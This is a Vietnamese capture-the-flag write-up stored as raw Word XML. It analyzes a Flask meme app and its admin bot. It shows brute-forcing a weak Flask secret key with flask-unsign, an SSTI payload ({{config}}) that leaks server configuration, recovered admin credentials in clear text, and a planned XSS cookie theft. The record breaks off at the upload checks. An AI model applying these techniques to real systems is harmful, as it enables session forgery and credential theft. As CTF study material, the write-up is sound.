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AF366A" w14:textId="1419C2F4" w:rsidR="00897E55" w:rsidRPr="00897E55" w:rsidRDefault="00897E55">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00897E55">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B58D233" w14:textId="1B9409B5" w:rsidR="00897E55" w:rsidRDefault="00897E55">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19452293" w14:textId="14374916" w:rsidR="000D5B66" w:rsidRDefault="000D5B6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Phân tích con bot.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FB85AB" w14:textId="7743BF31" w:rsidR="00CA6DA8" w:rsidRDefault="00CA6DA8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D0AC557" w14:textId="320C9B6B" w:rsidR="00CA6DA8" w:rsidRDefault="00CA6DA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Con bot lắng nghe ở cổng 3001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601E0AA0" w14:textId="720C4989" w:rsidR="00CA6DA8" w:rsidRDefault="00CA6DA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C6E0B06" wp14:editId="2B850672">
            <wp:extent cx="4872942" cy="1044202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657" cy="1045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91DE" w14:textId="28B32FC4" w:rsidR="00CA6DA8" w:rsidRDefault="00CA6DA8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D3C2826" w14:textId="5ED169A2" w:rsidR="00CA6DA8" w:rsidRDefault="00CA6DA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Khi truy câp /show, con bot sẽ chạy phương thức viewMeme()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0977BAEF" w14:textId="0000E4FC" w:rsidR="00CA6DA8" w:rsidRDefault="00CA6DA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A7DF654" wp14:editId="231ABCC6">
            <wp:extent cx="3865944" cy="262932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4745" cy="264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D5776" w14:textId="4555BBE2" w:rsidR="00CA6DA8" w:rsidRDefault="00CA6DA8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05159915" w14:textId="2F607F2C" w:rsidR="00CA6DA8" w:rsidRDefault="00CA6DA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Phương thức viewMeme() làm 3 việc:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E39F1B6" w14:textId="6F1FB0E7" w:rsidR="00CA6DA8" w:rsidRPr="00561998" w:rsidRDefault="00CA6DA8" w:rsidP="00561998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561998">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Đăng nhập trang bot_login_url với admin_username và admin_password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD28E6C" w14:textId="3325FCF8" w:rsidR="00CA6DA8" w:rsidRPr="00561998" w:rsidRDefault="00561998" w:rsidP="00561998">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00561998">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00561998">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BOT_LOGIN_URL: "http://meme-app:3000/login"</w:t>
      </w:r>
      <w:r w:rsidRPr="00561998">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6D8E36" w14:textId="5FA3F400" w:rsidR="00561998" w:rsidRPr="00561998" w:rsidRDefault="00561998" w:rsidP="00561998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561998">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Set cookie là flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD49285" w14:textId="22148B94" w:rsidR="00561998" w:rsidRPr="00561998" w:rsidRDefault="00561998" w:rsidP="00561998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561998">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Truy cập url để xem Meme</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E4F2A9" w14:textId="6661D3D8" w:rsidR="000D5B66" w:rsidRDefault="00CA6DA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6BE654" wp14:editId="05A35789">
            <wp:extent cx="4884516" cy="6860662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063" cy="688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04B2" w14:textId="3F060AD6" w:rsidR="00561998" w:rsidRDefault="00561998">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65DA9C57" w14:textId="5C28F5D9" w:rsidR="00561998" w:rsidRDefault="0056199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Làm sao để truyền Url vào phương thức viewMeme() thì xem tiếp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6C7E2B" w14:textId="1F310686" w:rsidR="00561998" w:rsidRDefault="00561998">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36D4006C" w14:textId="468CE234" w:rsidR="00561998" w:rsidRDefault="0056199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Có 1 ứng dụng khác chạy ở cổng 3000 để xem Meme</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CEACAD" w14:textId="04C31CC7" w:rsidR="00561998" w:rsidRDefault="00561998">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C33AD0C" w14:textId="5B09C15E" w:rsidR="00561998" w:rsidRDefault="00A8149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Giao diện trang chủ nhìn đơn giản:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204C22DE" w14:textId="42B971EC" w:rsidR="00A8149F" w:rsidRDefault="00A814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9964E73" wp14:editId="359F7E34">
            <wp:extent cx="4746679" cy="6319777"/>
            <wp:effectExtent l="0" t="0" r="317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4281" cy="632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4D30" w14:textId="79D82F37" w:rsidR="00A8149F" w:rsidRDefault="00A8149F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75985347" w14:textId="3E4C8C57" w:rsidR="00A8149F" w:rsidRDefault="00F23AE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Blueprint là 1 ứng dụng web được tích hợp trong ứng dụng flask</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B0CA9D" w14:textId="2E5996D1" w:rsidR="00F23AE5" w:rsidRDefault="00F23AE5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DFBA917" w14:textId="343D8E21" w:rsidR="00F23AE5" w:rsidRDefault="00953AE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Các route của chúng ta nằm ở 2 tập tin: auth.py và meme.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3882462E" w14:textId="78CB2368" w:rsidR="00953AEF" w:rsidRDefault="00953AEF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41355098" w14:textId="122CCE9E" w:rsidR="00A8149F" w:rsidRPr="00987A44" w:rsidRDefault="00987A44">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00987A44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Trang auth.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFF347A" w14:textId="688D052F" w:rsidR="00987A44" w:rsidRDefault="00987A44">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="631C75FC" w14:textId="4C8F943D" w:rsidR="00561998" w:rsidRDefault="00987A4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Route /register</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5F54E3" w14:textId="1E9C5305" w:rsidR="000D5B66" w:rsidRDefault="00987A4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1B1DEE" wp14:editId="0DD0CEDB">
            <wp:extent cx="5046562" cy="418336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294" cy="419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A7C7" w14:textId="4F1669A4" w:rsidR="00987A44" w:rsidRDefault="00987A44">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29DF853B" w14:textId="4422978D" w:rsidR="00987A44" w:rsidRPr="00987A44" w:rsidRDefault="00987A44" w:rsidP="00987A44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987A44">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>username, password phải là số và kí tự alphabet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1CE232" w14:textId="4DE65396" w:rsidR="00987A44" w:rsidRPr="00987A44" w:rsidRDefault="00987A44" w:rsidP="00987A44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987A44">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>độ dài của username là 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182179D6" w14:textId="4B0A4CBD" w:rsidR="00987A44" w:rsidRPr="00987A44" w:rsidRDefault="00987A44" w:rsidP="00987A44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987A44">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>độ dài của password là 32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7315621E" w14:textId="77777777" w:rsidR="00987A44" w:rsidRDefault="00987A44">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B97CB68" w14:textId="6E97E63F" w:rsidR="00897E55" w:rsidRDefault="00987A44">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB2F26">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55D5B8D7" wp14:editId="1453D17A">
            <wp:extent cx="5943600" cy="27527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F02D" w14:textId="1CE34694" w:rsidR="00987A44" w:rsidRDefault="00987A4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Route /login</w:t>
      </w:r>
      <w:r w:rsidR="002A4709">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> và /logout không có gì để khai thác</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E53367" w14:textId="57F1D8A6" w:rsidR="00987A44" w:rsidRDefault="00987A44">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70948160" w14:textId="0C343E95" w:rsidR="002A4709" w:rsidRDefault="002A470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Route /user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F007004" w14:textId="7641E2AB" w:rsidR="002A4709" w:rsidRDefault="002A470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FEEA4AC" wp14:editId="12BB1653">
            <wp:extent cx="5943600" cy="7416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5D43A" w14:textId="77777777" w:rsidR="00963FA6" w:rsidRDefault="00963FA6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="034325A0" w14:textId="65D23B38" w:rsidR="002A4709" w:rsidRDefault="002A470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user.id không được sàng lọc và in trực tiếp trong template_string</w:t>
      </w:r>
      <w:r w:rsidR="00963FA6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Nếu kẻ tấn công kiểm soát được user.id thì ứng dụng dễ bị dính lỗ hổng SSTI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B9CAEF" w14:textId="73AB3845" w:rsidR="00963FA6" w:rsidRDefault="00963FA6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A9A9C3E" w14:textId="39E32642" w:rsidR="00963FA6" w:rsidRDefault="00963FA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Để khai thác được lỗ hổng này, mình phải hiểu cách ứng dụng xác thực.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3F8825" w14:textId="5256C8EF" w:rsidR="00963FA6" w:rsidRDefault="00963FA6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66675C54" w14:textId="4C4B6A5B" w:rsidR="00963FA6" w:rsidRDefault="00963FA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CC0B51" wp14:editId="0036AB04">
            <wp:extent cx="5943600" cy="407416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BFDDB" w14:textId="350E523D" w:rsidR="00963FA6" w:rsidRDefault="00963FA6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0175B618" w14:textId="48BBB8C4" w:rsidR="00963FA6" w:rsidRDefault="00963FA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logged_user được lấy từ session</w:t>
      </w:r>
      <w:r w:rsidR="007B47C0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> và phân tích theo UserDecoder </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AC0F9E" w14:textId="37E00720" w:rsidR="007B47C0" w:rsidRDefault="007B47C0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="287E3197" w14:textId="04740315" w:rsidR="007B47C0" w:rsidRDefault="007B47C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Class UserDecoder được tùy chỉnh như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A6E2B1" w14:textId="2A5384A2" w:rsidR="007B47C0" w:rsidRDefault="007B47C0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6113F6B8" w14:textId="4D6397EC" w:rsidR="007B47C0" w:rsidRDefault="007B47C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DAA8E4A" wp14:editId="4B210903">
            <wp:extent cx="5943600" cy="19265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1ECA" w14:textId="6126FB01" w:rsidR="007B47C0" w:rsidRDefault="007B47C0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F78331A" w14:textId="5F1C5833" w:rsidR="007B47C0" w:rsidRDefault="00AA699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Trong flask, session c</w:t>
      </w:r>
      <w:r w:rsidR="00C2759B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ookie được kí </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> bằng thuật toán đối xứng. Để thay đổi được session, yêu cầu tạo 1 chữ kí hợp lệ. Liệu secret key có an toàn?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA1097D" w14:textId="45F5CBDD" w:rsidR="00AA699E" w:rsidRDefault="00AA699E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="019AB3C2" w14:textId="535614EB" w:rsidR="00AA699E" w:rsidRPr="00AA699E" w:rsidRDefault="00AA699E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA699E">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>app.config["SECRET_KEY"] = environ.get("SECRET_KEY", None) or randbytes(4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286D6911" w14:textId="08648805" w:rsidR="00AA699E" w:rsidRDefault="00AA699E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13C2EF4D" w14:textId="6BD5CCC6" w:rsidR="00AA699E" w:rsidRDefault="00AA699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Flask-unsign là 1 công cụ tấn công dồn dập flask sessions bằng wordlists (giống như rockyou.txt) và giả mạo 1 session mới hợp lệ. Nó có thể được dùng trong trường hợp này vì secret key yếu:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041DB926" w14:textId="77777777" w:rsidR="00AA699E" w:rsidRDefault="00AA699E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34D3FCBC" w14:textId="0354ABF8" w:rsidR="00AA699E" w:rsidRDefault="00AA699E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB2F26">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48850A1A" wp14:editId="7BE719CD">
            <wp:extent cx="5943600" cy="13544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EF4E" w14:textId="35A25404" w:rsidR="00AA699E" w:rsidRDefault="00AA699E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F7DEBFB" w14:textId="3D1CFC56" w:rsidR="00AA699E" w:rsidRDefault="00AA699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Payload SSTI như </w:t>
      </w:r>
      <w:r w:rsidR="00EB0EE9" w:rsidRPr="00EB0EE9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{{config}}</w:t>
      </w:r>
      <w:r w:rsidR="00EB0EE9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> có thể được kí để lộ cấu hình của máy chủ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C093920" w14:textId="4B96AB74" w:rsidR="00EB0EE9" w:rsidRDefault="00EB0EE9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB2F26">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77B5C681" wp14:editId="6F7A8D96">
            <wp:extent cx="5943600" cy="8997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53A2" w14:textId="43832074" w:rsidR="00EB0EE9" w:rsidRDefault="00EB0EE9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64EED7B7" w14:textId="48DAE53A" w:rsidR="003F3092" w:rsidRPr="008F5D9F" w:rsidRDefault="00EB0EE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Lưu ý là việc kiểm tra len(encoded) &gt; 85 để chống SSTI có thể phát triển thành RCE. Độ dài này đủ để chứa payload </w:t>
      </w:r>
      <w:r w:rsidRPr="00EB0EE9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"{{config}}"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> và có thể xóa thêm khoảng trắng để tiết kiệm một số kí tự.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F757F7" w14:textId="7C031EF7" w:rsidR="003F3092" w:rsidRPr="00FB2F26" w:rsidRDefault="003F3092">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EC7DEFF" w14:textId="6FA21192" w:rsidR="003F3092" w:rsidRPr="00FB2F26" w:rsidRDefault="00FB2F26">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB2F26">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4528BEEA" wp14:editId="48367141">
            <wp:extent cx="5880708" cy="3148314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6441" cy="315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FEA8" w14:textId="1D9E4D2C" w:rsidR="00FB2F26" w:rsidRPr="00FB2F26" w:rsidRDefault="00FB2F26">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65F4FCB5" w14:textId="77777777" w:rsidR="00FB2F26" w:rsidRDefault="00FB2F26">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB2F26">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>username=admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D03582A" w14:textId="6C649048" w:rsidR="00FB2F26" w:rsidRDefault="00FB2F26">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB2F26">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>password=hNm9Hyt#qD%E2Eh5CLeYNDASF@5X*#b$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69000F6B" w14:textId="1BE4CBAE" w:rsidR="00FB2F26" w:rsidRDefault="00FB2F26">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AE5AA44" w14:textId="77777777" w:rsidR="002D28BA" w:rsidRDefault="00E3642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Với thông tin đăng nhập của admin</w:t>
      </w:r>
      <w:r w:rsidR="00F92415">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, có thể đăng nhập và upload memes lên supermemes bucket. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE50CC5" w14:textId="46761CDC" w:rsidR="002D28BA" w:rsidRDefault="002D28B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C3DFC0A" wp14:editId="22033E7F">
            <wp:extent cx="2628900" cy="1270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6E176" w14:textId="41E5486D" w:rsidR="002D28BA" w:rsidRDefault="002D28BA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33669C77" w14:textId="14185292" w:rsidR="00E3642F" w:rsidRDefault="00F9241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Vì flag trong cookies của admin, một số loại XSS có thể được dùng để đánh cắp cookie.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04245DC5" w14:textId="022E00EC" w:rsidR="002D28BA" w:rsidRDefault="002D28BA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39E6139C" w14:textId="26A8981F" w:rsidR="002D28BA" w:rsidRDefault="002D28B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Bucket phải là supermemes thì admin mới truy cập</w:t>
      </w:r>
      <w:r w:rsidR="00ED335C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> được</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> meme </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE0935D" w14:textId="08347633" w:rsidR="00ED335C" w:rsidRDefault="00ED335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A6A947A" wp14:editId="63FB604C">
            <wp:extent cx="5208608" cy="3135180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102" cy="316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472A" w14:textId="3FD2B088" w:rsidR="00ED335C" w:rsidRDefault="00ED335C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10CB16CB" w14:textId="6337C0BE" w:rsidR="00ED335C" w:rsidRDefault="00ED335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Giải thích thêm: nếu bạn là người bình thường, chỉ được upload lên bucket memes. Admin không thích xem meme ở bucket trên. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CEBECF" w14:textId="447AC292" w:rsidR="00ED335C" w:rsidRDefault="00ED335C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34873DCC" w14:textId="6CEA297D" w:rsidR="00ED335C" w:rsidRDefault="00ED335C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED335C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Upload một meme lên bucket supermemes có thể thực thi XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4692E6" w14:textId="47C9C015" w:rsidR="00ED335C" w:rsidRDefault="00ED335C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21DACDDB" w14:textId="5E8E701B" w:rsidR="007726C6" w:rsidRDefault="007726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Tập tin được upload là 1 điểm tiêm payload hợp lý, nhưng route upload có thực thi một số kiểm tra:</w:t>
      </w:r>
    </w:p>
